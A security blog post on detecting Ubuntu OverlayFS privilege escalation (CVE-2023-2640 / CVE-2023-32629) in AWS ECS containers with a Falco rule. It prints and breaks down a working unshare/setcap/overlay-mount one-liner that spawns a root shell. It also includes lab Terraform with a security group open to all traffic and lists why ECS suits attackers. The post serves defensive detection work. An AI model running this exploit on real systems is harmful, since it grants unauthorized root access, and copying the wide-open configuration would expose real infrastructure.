Detecting Container Jailbreaks Using Falco

Detecting Container Jailbreaks Using Falco

Building Security and Monitoring into Containerized Workloads

·

8 min read

Running containerized workloads in non-root privileges is not only a way to enforce principles of least privilege, which recommends providing only the permissions necessary to perform a task and in turn limits lateral movement and reduces attack surfaces, but is also used to protect the host system from misconfiguration or even container escape.

provider "aws" {
  region = "ap-southeast-3"
}

resource "aws_vpc" "main" {
  cidr_block = "10.0.0.0/16"
}

resource "aws_subnet" "main" {
  vpc_id                  = aws_vpc.main.id
  cidr_block              = "10.0.1.0/24"
  availability_zone       = "${var.aws_region}a"  # Set the correct AZ
}

resource "aws_ecs_cluster" "cluster" {
  name = "example-cluster"
}

resource "aws_ecs_task_definition" "task" {
  family                   = "example-task"
  network_mode             = "awsvpc"
  requires_compatibilities = ["EC2"]
  cpu                      = "256"
  memory                   = "512"

  container_definitions = jsonencode([
    {
      name  = "bad",
      image = "manojahuje/ubuntu:jammy",
      cpu   = 256,
      memory = 512,
      essential = true,
      command = ["sleep", "3600"],
    }
  ])
}

resource "aws_ecs_service" "service" {
  name            = "example-service"
  cluster         = aws_ecs_cluster.cluster.id
  task_definition = aws_ecs_task_definition.task.arn
  launch_type     = "EC2"

  network_configuration {
    assign_public_ip = true
    subnets          = [aws_subnet.main.id]
    security_groups  = [aws_security_group.sg.id]
  }

  desired_count = 1
}

resource "aws_security_group" "sg" {
  vpc_id = aws_vpc.main.id

  ingress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

But recently, Crowdstrike discovered two new privilege escalation CVEs, CVE-2023-2640 and CVE-2023-32629, in the Ubuntu kernel. These two vulnerabilities came from an older vulnerability, CVE-2023-0386, where a vulnerability in OverlayFS to copy SUID files from a nosuid mount to outside directories enabled a privilege escalation to root.

OverlayFS is a critical technology in the modern computing environment, especially in container orchestration systems like Kubernetes. Its functionality facilitates the layered filesystems that containers use, which is essential for the efficient, modular, and fast deployment that these systems are known for.

As a union mount filesystem, it involves the interplay between the lower (read-only) and upper (read-write) layers in the filesystem. While this is one of the features that grant OverlayFS its flexibility and utility, it can indeed also be a vector for potential vulnerabilities.

The transfer of files from the lower to the upper layer, such as the one demonstrated above utilizes a process known as copy-up, wherein files are literally copied up from the lower to the upper layer when they are modified.

# Step 1: Set up the directories that will be used as the lower, upper, work, and merged directories.
mkdir -p /overlay/{lower,upper,work,merged}

# Step 2: Copy the Python binary (or any other file) to the lower directory.
cp /usr/bin/python3 /overlay/lower/

# Step 3: Mount the overlay filesystem with the specified lower, upper, work, and merged directories.
mount -t overlay overlay -o lowerdir=/overlay/lower,upperdir=/overlay/upper,workdir=/overlay/work /overlay/merged

# Step 4: Verify that the Python binary is accessible in the merged directory.
ls /overlay/merged/python3

# Step 5: Use the touch command on the Python binary in the merged directory to initiate a copy-up operation.
touch /overlay/merged/python3

# Step 6: Verify that the Python binary has been copied to the upper directory.
ls /overlay/upper/python3

CVE-2023-2640 and CVE-2023-32629 abused vulnerabilities in the ovl_copy_xattr function, extended attributes including sensitive capabilities like CAP_SYS_ADMIN or CAP_SETUID is being transferred from files in the lower directory to the upper directory. The code doesn't contain any function to limit or sanitize the capabilities being transferred, potentially allowing privileged operations to be performed by unprivileged users.

The function is also invoked inside ovl_copy_xattr, and it, in turn, calls a vulnerable wrapper function __vfs_setxattr_noperm which does not restrict the file security capabilities to a namespace, potentially opening a pathway for privilege escalation.

error = ovl_do_setxattr(OVL_FS(sb), new, name, value, size, 0);

The function also does not sufficiently handle errors and potential bad states. For instance, while it handles several error cases, it allows for the possibility of bypassing security measures through extended attributes that are not correctly handled or sanitized.

if (error < 0 && error != -EOPNOTSUPP)
    break;
if (error == 1) {
    error = 0;
    continue; /* Discard */
}

Exploiting to exploit that vulnerability we can use the following long-winded, but in actuality a very simple command.

unshare -rm sh -c "mkdir 1 u w m && cp /usr/bin/python3 1/; \
setcap cap_setuid+eip 1/python3; \
mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w m && touch m/*;" \
&& u/python3 -c 'import pty;import os;os.setuid(0); pty.spawn("/bin/bash")'

To break down the command we first need to understand the exploit chain. Initially, the unshare -rm command is run, establishing a new namespace with isolated mount points and root permissions, effectively separating it from the main system’s environment. Here, unshare -rm acts as the foundation, facilitating the environment required to perform the exploit.

unshare -rm

Subsequently, a series of directories (1, u, w, m) are created to stage the overlay filesystem, followed by copying the Python3 binary from its standard location to the newly created directory labeled ‘1’.

mkdir 1 u w m && cp /usr/bin/python3 1/;

The setcap command then grants the CAP_SETUID capability to the Python3 binary, a crucial step, because it permits users executing this binary to assume the file owner's privileges, laying the ground for the privilege escalation which is the goal of this exploit.

setcap cap_setuid+eip 1/python3;

Thereafter, the mount command is leveraged to construct an overlay filesystem, designating the directory labeled ‘1’ as the lower layer, which hosts the Python3 binary equipped with the enhanced capabilities, setting up the stage for the copy-up operation that follows.

mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w m

Following this, the touch m/*; part of the command instigates a copy-up operation which transplants files from the lower layer to the upper layer, thereby transplanting the Python3 binary with retained capabilities to the upper, writable layer. This step is pivotal because it facilitates accessibility to the manipulated binary for the non-root user executing the command.

touch m/*;

In the final chain, a Python script is executed using the binary that was translocated to the upper layer. Initially, it uses the os.setuid(0) function to modify the user ID of the current process to zero, thus acquiring root user privileges. This is enabled by the high-level capabilities of the binary. Subsequently, leveraging the pty.spawn("/bin/bash") function, it initiates a Bash shell with root privileges, which essentially hands over full control of the system to the user.

u/python3 -c 'import pty;import os;os.setuid(0); pty.spawn("/bin/bash")'

And this method works. The following was gathered from an AWS ECS instance accessed via SSH using ECS Exec (part of AWS SSM but for containerized workloads).

AWS ECS provides several advantages from an attacker's perspective :

  • It's not covered by AWS's runtime security platform, AWS GuardDuty, which currently only supports the detection of containerized workloads in Elastic Kubernetes Service (EKS)

  • While EDRs like Crowdstrike have capabilities to detect and mitigate threats inside of containers, alot of vendors don't like to put EDRs inside of containers due to their performance impacts

  • AWS CloudTrail logs can provide insight into unusual API calls or access patterns, but sometimes without automated detection SOC teams get inundated with useless logs from CloudWatch

This is where Falco comes in. Falco is an open-source Cloud Native Computing Foundation (CNCF) project that uses eBPF (Extended Berkeley Packet Filter) to detect anomalous activity in your containerized applications. eBPF operates at the kernel level, allowing for high-performance monitoring of system and network activities with minimal overhead. This means it can perform monitoring tasks efficiently without significantly affecting system performance.

Rules within Falco are written using Falco rule files, which are written mostly in YAML format.

- rule: Suspicious setcap Usage
  desc: >
    Detects when the setcap command is used to set the cap_setuid capability, which could potentially be used in privilege escalation attacks.
  condition: >
    spawned_process and proc.name = "setcap" and (proc.args contains "cap_setuid+eip")
  output: >
    Suspicious setcap usage detected (user=%user.name command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
  priority: CRITICAL
  tags: [process, mitre_privilege_escalation]

Explanation:

  • spawned_process: This macro is used to detect when a new process has been spawned.

  • proc.name = "setcap": This condition matches when the process name is "setcap".

  • proc.args contains "cap_setuid+eip": This condition matches when the arguments to the process contain the string "cap_setuid+eip", which is the critical part of the exploit that sets the necessary capabilities on the python3 binary.

  • output: This defines the output format of the alert message, which includes useful information such as the username of the user who ran the command, the full command line, and container information (if applicable).

Falco also has a plugin for Cloudtrail and Fargate. The Falco engine compares the monitored container host and Kubernetes node activities to the Falco ruleset and generates an alert when a match is found. As most major SIEM/SOAR platforms charge log ingestion per gigabyte, sending alerts and not the full collection is more effective and affordable.

When a Falco alert is triggered based on the Falco ruleset, an alert with all its metadata will be forwarded via Falcosidekick to a central remote Syslog server in JSON Syslog format. Falcosidekick supports JSON Syslog CEF (Common Event Format), The nature of CEF means we don't need to use other platforms to convert the log format and forward the log data to any SIEM.

Falco alerts data is forwarded via remote Syslog to any SIEM you prefer, such as Splunk (Splunk Search Processing Language (SPL)), DEVO (Link Integrated Query)), and Microsoft Sentinel (Kusto Query Language)).

You can create custom alerts in your SIEM to reduce alert fatigue and perform threat hunting based on the query languages of your preferred SIEM. However, mature rulesets reduce false positives and further save on SIEM ingestion costs.